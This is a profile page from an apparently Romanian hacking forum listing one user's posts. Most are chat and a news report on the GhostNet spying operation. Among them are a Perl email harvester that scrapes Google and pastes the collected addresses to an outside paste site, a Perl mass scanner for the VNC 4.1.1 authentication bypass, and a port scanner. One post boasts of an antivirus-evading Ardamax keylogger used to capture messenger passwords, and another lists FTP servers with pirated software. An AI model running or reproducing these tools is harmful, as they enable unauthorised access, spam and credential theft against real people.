Jump to content

daatdraqq

Active Members
  • Posts

    4537
  • Joined

  • Last visited

  • Days Won

    32

Everything posted by daatdraqq

  1. Ma , chiar si testul ala cu broastele sa stiti ca atrage copiii.Ala e un joc pentru copii si ai ocazia ca un om serios care vrea sa se inscrie pe forum sa se lipseasca tocmai din cauza jocului ala .Nu inspira seriozitate .Dupa parerea mea rezolvarea este : 1)in loc de broaste un test de cultura generala sau intrebari gen "test psihologic " si rezultatul sa fie reflectat intr-un punctaj .Cei care nu l-au trecut din 3 incercari -ban pe ip 2)celor care fac cereri gen "vreau cqkill plsssss" sa nu le raspunda nimeni -sters post- ban (pe ip ca altfel isi face alt cont ) 3)sa dam dovada de mai multa seriozitate,interes si respect Oricum eu pe unde am citit de RST sa stiti ca lumea in general are o idee buna sau fabuleaza .De rau inca nu am vazut sa se vorbeasca . edit : 4)Sa avem grija de userii care intradevar fac ceva ex : neox ,nu l-am mai vazut de foarte mult timp pe forum .Omul chiar stia ce face si facea bine .Asemenea oameni trebuie tinuti aproape
  2. Ascundeti link-urile de download si dati-ne si noua voie intr-o zi sa aruncam o geana pe acolo
  3. Asa merge ,dar sunt unele telefoane care te lasa sa o pui direct de pe tel in momentul in care suni .
  4. "2009 mai amenintator din cauza atacurilor pe Internet" Cel mai mare pericol in 2009 e guvernul romaniei ,asta de rahat si de ratati care ne indoaie cu impozitele .Astia vor sa ne vanda ,altfel nu-mi explic .( scz de off)
  5. M-am certat si eu cu baba asta Din pacate merge doar pe tel mai vechi ,pe astea mai noi nu te lasa sa dai start in timpul convorbirii .Cel putin la e51 nu merge .
  6. Ce draqq caut eu aici ?.... :-o
  7. 1800 de vizionari ....pfffff...ce-ati mai umbla dupa mocaciuni ) Doar bataia si aerul e moca ,nu mai cautati altceva ..
  8. "a cauzat pagube in valoare de aproximativ 80 de milioane de dolari. " Explicati-mi si mie in ce consta paguba asta ca sa fiu al dracu daca inteleg . Sau mai sunt astia care prezinta pe la stiri " cutarescu a accesat baza de date nasa ,nu a modificat nimic ,dar a cauzat o paguba de 100 mii de euro " .Cum dracu a cauzat ma paguba asta ,a vandut serverul ,a vandut hd-cul ....?
  9. TORONTO / 09:21, 29.03.2009 Cel pu?in patru ambasade ale României au fost vizate de o vast? opera?iune de spionaj, controlat? aproape integral de computere din China, care a permis sustragerea de documente din sute de birouri guvernamentale ?i private din întreaga lume, conform unui raport publicat de cercet?tori canadieni. Studiul, realizat de Information Warfare Monitor, format din cercet?tori de la Universitatea din Toronto ?i organiza?ia canadian? SecDev Group, afirm? c? printre ?intele vizate de opera?iunea de spionaj s-ar num?ra ?i ambasadele României în Finlanda, Fran?a, Norvegia ?i China. Potrivit edi?iei electronice a cotidianului canadian Globe and Mail, cercet?torii de la Universitatea din Toronto au identificat 1.295 de computere compromise la Ministerele de Externe din Iran, Bangladesh, Letonia, Indonezia, Filipine, Brunei, Barbados ?i Bhutan, dar ?i la ambasade ale Indiei, Coreei de Sud, Indoneziei, României, Ciprului, Maltei, Thailandei, Taiwanului, Portugaliei, Germaniei ?i Pakistanului. Edi?ia electronic? de duminic? a cotidianului New York Times afirm? c? printre computerele atacate se num?r? ?i cele ale lui Dalai Lama, cel care le-a ?i solicitat cercet?torilor canadieni o analiz? a sistemelor informatice. Ace?tia au descoperit îns? o re?ea vast? pe care au denumit-o GhostNet ?i care a infiltrat, în decurs de mai pu?in de doi ani, cel pu?in 1.295 de computere din 103 ??ri, concentrându-se în principal asupra sistemelor guvernamentale din Asia de Sud ?i de Sud-Est. Conform raportului, opera?iunea de spionaj este în desf??urare ?i se extinde la mai mult de 12 sisteme s?pt?mânal. Cercet?torii afirm? îns? c? nu au descoperit dovezi c? re?eaua ar fi vizat ?i sisteme guvernamentale americane, de?i un computer NATO a fost monitorizat timp de 12 ore, iar computerele de la ambasada indian? din Washington au fost infiltrate. Autorii raportului au avertizat c?, de?i majoritatea computerelor implicate în aceast? re?ea se afl? în China, nu trebuie tras? neap?rat concluzia c? guvernul de la Beijing administreaz? re?eaua, care ar putea reprezenta o afacere privat? sau opera unor cet??eni chinezi cunoscu?i drept "hackeri patrio?i". Un purt?tor de cuvânt al Consulatului chinez la New York a respins ideea implic?rii guvernului chinez. "Guvernul chinez se opune ?i interzice strict orice infrac?iune cibernetic?", a spus el. http://m.mediafax.ro/
  10. daatdraqq

    Dilema

    Am facut un server ardamax nedetectabil pentru avast .L-am probat cu avastul in functiune si totul a fost ok. In secunda 2 il transfer pe alt pc care avea tot avast ,aceeasi versiune ,dar aici l-a detectat . Cum va explicati asta ?Mentionez ca amandoua erau updatate la zi ,aceeasi versiune si cu licenta .
  11. Nu-i trebuie driver backtrack-ului ca sa se conecteze .Iti cumperi o placa de retea wireless (daca nu ai ) si te conectezi ...Plm ,nu prea am inteles intrebarea ...
  12. Uitati inca unul in perl .. #!/usr/bin/perl # Script : E-Mail eXtractor # Author : Osirys # Contact : osirys[at]live[dot]it # Thx: StAkeR # *Use it under a *nix box # THIS IS THE PUBLIC RELEASE # In the private release, you can scan all kind of emails that you want, on a lot of different engines. use IO::Socket::INET; use HTTP::Request; use LWP::UserAgent; use HTTP::Request::Common; print q{ ------------------------------------- [> E-Mail eXtractor [> PUBLIC RELEASE [> Coded by Osirys [> Contact: osirys[at]live[dot]it ------------------------------------- }; my $mode = $ARGV[0]; $gtest = ("www.google.com/search?q=hi&hl=en&start=10&sa=N"); CASES : { &usage(), last CASES if (!$ARGV[0]); &bash(), last CASES if ($mode =~ /bash-mode/); &usage(), last CASES if (($mode =~ /irc-mode/)&&(!$ARGV[1])|(!$ARGV[2])|(!$ARGV[3])|(!$ARGV[4])); &irc_mode($ARGV[1],$ARGV[2],$ARGV[3],$ARGV[4]), last CASES if (($mode =~ /irc-mode/)&&(($ARGV[1])||($ARGV[2])||($ARGV[3])||($ARGV[4]))); &help(), last CASES if ($mode =~ /help/); } sub help() { print q{ --- HELP --- If you have a direct command line on the server where you are launching the script, like you are in with a bash shell, you can just use the bash mode. Unless, if you can't have a direct command line, launch it in irc-mode, so you will command the script under Irc. This is the public release. In the private release you can scan all kind of emails, on a lot of different engines. Thank you using E-Mail eXtractor By Osirys }; &usage(); } sub usage() { print "\nUsage:\n"; print " [1] perl $0 bash-mode - FOR A SHELL USE\n"; print " [2] perl $0 irc-mode server port nick chan - FOR IRC USE\n"; print " [+] perl $0 help - FOR HELP\n"; print "[?] Coded by Osirys\n\n"; exit(1); } sub bash() { print "\n[+] Cheeking if my ip is banned by Google..\n"; $re = query($gtest); $re =~ /Google Home/ || die "[-] Sorry, Test not passed, got banned by Google, try again later\n"; print "[+] Test passed. Google Status: Ready\n"; print "[+] Insert now the email domain to find\n"; print "[*] Domains allowed: hotmail ~ msn ~ gmail ~ libero ~ yahoo ~ virgilio ~live ~ alice\n"; $domain = <STDIN>; chomp($domain); $domain =~ /hotmail|msn|gmail|libero|yahoo|virgilio|live|alice/ || die "[-] Error, or domain not allowed\n"; print "[+] Ok, searching \@$domain emails on Google ..\n"; &find($domain,"bash-mode"); print "[+] Done\n"; } sub irc_mode() { my ($ircd, $port, $nick, $chan) = @_; if (fork() == 0) { &irc($ircd, $port, $nick, $chan); } else { exit(0); } } sub irc() { my ($ircd, $port, $nick, $chan) = @_; $chan =~ s/(.+?)/\#$1/; print "\n[+] Connecting on:\nServer/Port: $ircd:$port\nNick: $nick\nChannel: $chan\n# Coded by Osirys\n\n"; $c0n = IO::Socket::INET->new(PeerAddr => "$ircd",PeerPort => "$port",Proto => "tcp") || die "[-] Can not connect on $ircd!\n"; $c0n->autoflush(1); print $c0n "NICK $nick\n"; print $c0n "USER eMailer 8 * : Osirys\n"; print $c0n "JOIN $chan\n"; wr($chan,"15,1/_ E-Mail eXtractor Public Release Launched !!"); wr($chan,"11,1? Coded by Osirys"); while ($line = <$c0n>) { if ($line =~ /^PING \.*)/) { print $c0n "PONG :$1"; } if ($line =~ /PRIVMSG $chan :!help/) { wr($chan,"15,1-= E-Mail eXtractor Public Release =-"); wr($chan,"11,1? Coded by Osirys"); wr($chan,"9,1!help 4,1>7,1 For Help"); wr($chan,"9,1!domain 4,1>7,1 Get the domains avaible"); wr($chan,"9,1!start domain 4,1>7,1 Start the scann on the domain choosed"); wr($chan,"9,1!killme 4,1>7,1 Kill the Bot"); } if ($line =~ /PRIVMSG $chan :!killme/) { wr($chan,"4,1Bye Bye!!"); print $c0n "QUIT"; exec("pkill perl"); } if ($line =~ /PRIVMSG $chan :!domain/) { wr($chan,"15,1[*] Domain allowed: hotmail, msn, gmail, libero, yahoo, virgilio, live, alice"); } if (($line =~ /PRIVMSG $chan :!start\s+(.*)/)&&(fork() == 0)) { my $mail = $1; wr($chan,"15,1[+] Cheeking if my ip is banned by Google.."); $re = query($gtest); if ($re =~ /Google Home/) { wr($chan,"9,1[+] Test passed. Google Status: Ready"); if ($mail =~ /hotmail|msn|gmail|libero|yahoo|virgilio|live|alice/) { wr($chan,"15,1[+] E-Mail eXtractor started, emails: 9,1\@$mail"); &find($mail,"irc-mode"); wr($chan,"4,1[-] E-Mail eXtractor finished, emails: 9,1\@$mail"); } else { wr($chan,"4,1[-] Error, or domain not allowed"); } } else { wr($chan,"4,1[-] Sorry, Test not passed, got banned by Google, try again later"); } } } } sub find() { my @domain = ("at","com.au","com.br","ca","ch","de","dk","es","fr","it","co.jp","com.mx","co.uk"); my @langs = ("de","en","br","en","de","de","dk","es","fr","it","jp","es","en"); my @country = ("AT","AU","BR","CA","CH","DE","DK","ES","FR","IT","JP","MX","UK"); my $mail = $_[0]; my $mode = $_[1]; my @forks; my $count = 0; my $dd = 0; my $l = 0; my $c = 0; foreach my $d(@domain) { if ($count % 1 == 0) { foreach my $f(@forks){ waitpid($f,0); } } $forks[$count] = fork(); if ($forks[$count] == 0) { for ($i=0;$i<=1000;$i+=100) { my $gsup = ("www.google.".$d."/search?q=\@".$mail.".".$d."&num=100&hl=".$langs[$l]."&cr=country".$country[$c]."&as_qdr=all&start=".$i."&sa=N"); my $re = query($gsup); while ($re =~ m/([\w\-\+\.]+)\@<em>$mail<\/em>\.<em>$d<\/em>/g) { my $user = $1; push(@tot, $user); } } @unique = unique(@tot); @ord = sort(@unique); my $nickname = "$mail.".$d; if ($mode =~ /bash-mode/) { open($file, ">>", "$mail."."$d.txt"); foreach my $u(@ord) { print $file "$u"."@"."$mail."."$d\n"; } print "[*]Found ".scalar(@ord)." \@".$mail.".".$d." emails. Cheek in: $mail.$d.txt\n"; } elsif ($mode =~ /irc-mode/) { &paste($nickname,@ord); } exit(0); } $l++; $c++; $count++; $dd++; } foreach my $f(@forks){ waitpid($f,0); } } sub paste() { my $name = $_[0]; my @tot = @_[1]; my $cont = join("\n",@tot); my $p_ua; my $p_request; $p_ua = LWP::UserAgent->new( agent => "StAkeR ~ Paste", timeout => "0" ); $p_request = $p_ua->post("http://nopaste.biz", [ insert => "1", name => "$name EMails", beschreibung => "$name Emails, powered by Osirys", code => $cont ] ); if ($p_request->is_success) { if ($p_request->content =~ /URL=(.+?)\">/) { my $link = $1; wr($chan,"9,1[!]$name Emails Link4,1 =>11,1 $link"); } } } sub unique { my @unique = (); my %seen = (); foreach my $s(@_) { $s =~ s/\/+/\//g; next if $seen{$s}++; push(@unique,$s); } return @unique; } sub query() { my $url = $_[0]; my $host = $url; my $query = $url; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; eval { my $sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; my @r = <$sock>; $page = "@r"; close($sock); }; return $page; } sub wr() { my $chan = $_[0]; my $cont = $_[1]; print $c0n "PRIVMSG $chan :$cont\n"; }
  13. Bai fratilor sa mor de nu ma dau peste cap asemenea stiri ,mi se rupe inima ...dar nu asa se rezolva problema daca dau eu 1 mil si altu 5 mil ...etc Nu asa se rezolva problema pentru ca sunt n cazuri de genul asta si nu-i poti ajuta pe toti ...Astea sunt cazuri care trebuiesc rezolvate fara bani de orice spital din lume ..Ne comportam pur si simplu ca niste animale fara discernamant(la societate in general ma refer ) daca atunci cand vezi un caz dinasta ,ca doctor , te uiti la el si-i spui senin " te costa atat sa te salvez ,daca nu ai bani mori " .Nu este normal ce se intampla ,nu cred ca ar falimenta vreo fabrica de medicamente si nu cred ca s-ar uza vreun aparat performant daca li s-ar acorda asistenta gratuita oamenilor cu probleme de genul asta ....E mult de vorbit pe tema asta ...
  14. http://www.websiteoutlook.com rstcenter.com Estimated Worth $10402.5 USD ,Buuuun asa ,bravo baieti , gras curcanu'
  15. #!/usr/bin/perl # Multi-threaded scan for OpenVNC 4.11 authentication bypass. use strict; # why not? use warnings; use IO::Socket; use threads; use threads::shared; use Errno qw(EAGAIN); # Configuration variables use constant VNC_PORT => 5900; my $splits = 5; # Creates 2^N processes. my $avg_time = 5; # Tweak this to get better time estimates. our $subnet; our @results : shared; our $todo = 0; my $orig_thread = "yes"; my $start; my $end; my $time_estimate; my $elapsed = time; my $out_file; ++$|; # To watch as the results come in, in real time. $subnet = $ARGV[0] || ""; # Get subnet from command line, else ask for it. while (1) { last if $subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/; print "\nWhat subnet do you want to scan? "; chomp($subnet = <STDIN>); print "That does not look right. Enter something like 192.168.1.*\n\n"; } # Put the subnet in the form x.y.z. so we can just concatenate the hostnum. $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/; $subnet .= "."; $out_file = "VNC_" . $subnet . "txt"; # Mostly a guesstimate $time_estimate = $avg_time * (256 / (2**$splits)); $time_estimate = int ($time_estimate / 60); $time_estimate += 4; print "\nScanning subnet ${subnet}x -- this should take approximately $time_estimate minute(s).\n"; print "[!] = Vulnerable, [*] = Safe, [.] = No response.\n\n"; CHECK: { unless ($splits >= 0 && $splits <= 8) { die "ERROR: Do not split $splits times--that makes no sense.\n"; } unless ($splits <= 5) { warn "Reduce the number of splits from $splits to 5 or less if you get memory errors.\n\n"; } } # Ugly, but this works. DivideWork() if $splits >= 1; DivideWork() if $splits >= 2; DivideWork() if $splits >= 3; DivideWork() if $splits >= 4; DivideWork() if $splits >= 5; DivideWork() if $splits >= 6; DivideWork() if $splits >= 7; DivideWork() if $splits >= 8; # Which IPs this thread scans. $start = $todo << (8 - $splits); $end = $start + (256 / (2**$splits)) - 1; foreach ($start .. $end) { Scan_VNC($_); } wait until $?; # Wait for children to finish. exit unless $orig_thread eq "yes"; # Only the original parent thread will continue. $elapsed = time - $elapsed; $elapsed /= 60; $elapsed = int $elapsed; print "\n\nFinished scanning ${subnet}x in $elapsed minute(s).\n"; SaveData(); exit; #################################### sub DivideWork { my $pid; FORK: { $todo *= 2; if ($pid = fork) { # Parent ++$todo; } elsif (defined $pid) { # Child $orig_thread = "no"; } elsif ($! == EAGAIN) { # Recoverable forking error. sleep 7; redo FORK; } else { # Unable to fork. die "Unable to fork: $!\n"; } } } sub SaveData { my $vulns = 0; open(FOUND, ">", $out_file) or die "Cannot open $out_file -- $!"; foreach my $IP (1..254) { my $record; $record = $results[$IP]; unless ($record =~ m/not vulnerable/io) { ++$vulns; print FOUND $record; } } print FOUND "\nVulnerabilites found: $vulns"; close(FOUND) or die "Cannot close $out_file -- $!"; print "Data saved to ${out_file}\n\n"; } sub Scan_VNC { # Scan for OpenVNC 4.11 authentication bypass. my $hostnum = shift; my $host = $subnet . $hostnum; my $sock; my $proto_ver; my $ignored; my $auth_type; my $sec_types; my $vnc_data; $host or die("ERROR: no host passed to Scan_VNC.\n"); # The host numbers .0 and .255 are reserved; ignore them. if ($hostnum <= 0 or $hostnum >= 255) { return; } # Format things nicely--that crazy formula just adds spaces. $results[$hostnum] = "$host"; $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = "; unless ($sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => VNC_PORT, Proto => 'tcp',)) { $results[$hostnum] .= "Not vulnerable, no response.\n"; print "."; return; } # Negotiate protocol version. $sock->read($proto_ver, 12); print $sock $proto_ver; # Get supported security types and ignore them. $sock->read($sec_types, 1); $sock->read($ignored, unpack('C', $sec_types)); # Claim that we only support no authentication. print $sock "\x01"; # We should get "0000" back, indicating that they won't fall back to no authentication. $sock->read($auth_type, 4); if (unpack('I', $auth_type)) { $results[$hostnum] .= "Not vulnerable, refused to support authentication type.\n"; print "*"; close($sock); return; } # Client initialize. print $sock "\x01"; # If the server starts sending data, we're in. $sock->read($vnc_data, 4); if (unpack('I', $vnc_data)) { $results[$hostnum] .= "VULNERABLE! $proto_ver\n"; print "!"; } else { $results[$hostnum] .= "Not vulnerable, did not send data.\n"; print "*"; } close($sock); return; }
  16. #!/usr/bin/perl use IO::Socket; print q { r00ta - teh p0rt scannz0r }; sleep 1; print "[-] Insert Ip Address: "; chomp($ip = <STDIN>); if(!$ip) { print "\n[-] Error!!!"; exit } print "\n[-] From Port: "; chomp($from = <STDIN>); if(!$from) { print "\n[-] Error!!!"; exit } print "\n[-] To Port: "; chomp($to = <STDIN>); if(!$to) { print "\n[-] Error!!!"; exit } print "\n[-] Ports Open: "; for($ports = $from; $ports <= $to; $ports++) { $xyz = 1; my $conn = IO::Socket::INET->new(Proto => "tcp", PeerPort => $ports, PeerAddr => $ip, Timeout => 1 ) || $xyz++; close($conn); chomp($gethost = getservbyport($ports,"tcp")); if($xyz==1) { print "[$ports]\n" ; } }
  17. daatdraqq

    FTP -uri

    ftp://ftp.kiarchive.ru/pub/.1/misc/sounds/ ftp://ftp.icm.edu.pl /vol/rzm1/mp3 ftp://ftp.sugardas.lt /Visaginas/MUSIC/ ftp://ftp.whtech.com /music ftp://ftp.no.scene.org /scene.org/music ftp://ftp.gk.spb.ru /pub/music/ ftp://stalkerg.yasenevo.net /music/ ftp://ftp.riddle.vrn.ru /2004/music/ ftp://ns.asu.ru /pub/music/ ftp://ftp.nl.scene.org /pub/music/ http://dl.net.hr /mp3/dj_sets/ http://maximumfm.10gb.ru /MP3/ http://www.themagicofdc.com /multimedia/mp3/ http://m-aziko.hopto.org/ -----------MIRROR SITE---------------- ftp://ftp.mirrorservice.org/sites/ ftp://ftp.uk.i-scream.org/sites ftp://ftp.rusfaq.ru/pub/books -------------OKE------------- ftp://194.116.195.234 /Unload/ ftp://sony.telenet.ru ---------------PALING TOP BANGET---------- ftp://ftp.dsip.net/Unload/Chernoknizhni ... %F2%E0%E6/ ----------------PERLU LOGIN------------- ftp://micros.hensa.ac.uk/sites/ ftp://mail.sevstar.net/ ftp://malovsa.dialup.corbina.ru/=SOFT=/ ftp://ftp.deman.ru/Pub ftp://91.196.92.5 /common/OGP/ ftp://87.224.209.222 /Distrib/Media/AdobePrimere7.0Pro ftp://89.222.156.40 /Soft/multimedia/ ftp://213.184.241.160/ ftp://80.237.66.12 /pub/Program ftp://213.130.23.203 /inbound/prog/ ftp://82.138.14.147 /soft/VideoEdit ftp://193.40.128.75 /pub/Priit/maciproged ---------BARU----------- ftp://soi.karelia.ru/security/~Video_conv/ ----------TOOP AKTIF TOOP---------- ftp://194.190.136.25/ -----------TOP ftp://82.199.102.119 /Incoming/Appz/ ftp://213.134.203.22 /pub/ ftp://193.140.41.75/ ftp://82.226.100.177 /kracks/supergege/ ftp://212.9.224.73 /pub/Download/ ftp://62.118.194.196 /pub/distrib/ ftp://217.17.172.46/ /WIN/ ftp://201.157-224-87.telenet.ru /Distr/??????????? ?????? ? ?????????/ ftp://81.95.186.234 /download/ ftp://180.165.249.ozerki.net /SOFT++/ -------->TOP ftp://89.19.167.233 /_Soft/ ftp://80.92.241.171/ ftp://82.199.99.19 / -------------> TOP ftp://161.184.245.69 /pub/winsite/winxp/ ------->TOP MARKOTOP ftp://161.184.245.70 /pub/winsite/winxp/ ------->TOP MARKOTOP ftp://213.183.100.82 /SoftWare-Pub/ ftp://ftp.nl.scene.org /pub/mags/-----------MAJALAH ftp://ftp.uk.i-scream.org /sites/www.pdacentral.com/ ftp://ftp.cgiar.org ftp://ftp6.ahead.de/ ftp://ftp.sannet.ne.jp /pub/ ftp://ftp.youngcow.net /Public/Document/Image/ ftp://ftp.darvision.com /pub/MV401-Lite/HD%20Plug-in%20premiere/ ftp://cd-video.ru /Programs/ ftp://cd-video.ru /Programs2/ ftp://ftp.cd-video.ru/ ftp://ftp.otrb.ru /pub/ ftp://ftp9.nero.com/ ftp://ftp.adobe.com /pub/adobe ftp://micros.hensa.ac.uk /sites/ftp.tucows.com/tucows/ ftp://ftp1.mega.kg /soft/ ftp://iso3.jp.netbsd.org /pub/network/isc/pub/usenet/control/ ftp://ftp.cis.nctu.edu.tw/ ftp://ftp.iinet.net.au /pub/apple/English-North_American/ ftp://ftp.isu.edu.tw /pub/Apple ftp://ftp.whtech.com/ ----------- SOFTWARE ----------- ftp://82.162.137.227 /acronics/ ftp://80.92.99.201 /Pub/Soft/ ftp://194.190.136.25 /software.programs/ http://www.oltenia.ro /download/pub/windows/ http://xfiles.erin.utoronto.ca /pub/windows/ ftp://stalkerg.yasenevo.net/ ftp://ftp.skynet.be /pub/tucows.skynet.be ftp://ftp.uni-hannover.de /pub/mirror/mswindows/ ftp://zorg.sci-nnov.ru /pub/windows/games/gamesfiles/ ftp://ns.asu.ru /pub/Windows/ ftp://ftp.steinberg.net /Download/ ftp://ftp.tuwien.ac.at /zz9/pc/-----------TOP ftp://ftp.yaroslavl.ru /pub/windows-------------TOP ftp://ftp.nsysu.edu.tw /Windows/Simtelnet/winxp/-----TOP ftp://ftp.tomsknet.ru /pub/windows
  18. Cei mai buni hackeri ..hmm..nu veti auzi niciodata numele lor ..Esti cunoscut cand esti prins ,baietii destepti nu sunt prinsi
  19. Daca joci un joc serios vei observa ca viteza se mareste doar la tine in pc ,nu are cum sa afecteze serverul ,decat daca serverul il gazduiesi tu . Nu merge la jocurile online multiplayer ,unde jocul este gazduit pe un server independent de jucatori .
  20. Ce plm o vrea cineva sa faca cu parola mea de mess nu am inteles si nici nu o sa inteleg vreodata ,de tot alearga toata lumea dupa programe de "spart" mess .Eu am toate contactele salvate intr-un notepad ,imi bag pula in el de id si fac altul ...Se lauda cate unii ca au spart mess-ul nu stiu cui de parca au spart o fata mare ...Am prins cu ardamax la id-uri si parole de mess de mi-a venit rau ,sa mor daca am fost vreodata curios sa intru pe id-ul vreunuia sau sa-i schimb parola ...sau mai stiu yo ce ..
  21. Si avira mai are obiceiuri dinastea ,dar tinand cont ca 99% dintre noi folosim programe piratate ,crack-uite, bubuite ..etc nu putem sa ne ridicam cu pretentii.Ciocu' mic si joc de glezne
×
×
  • Create New...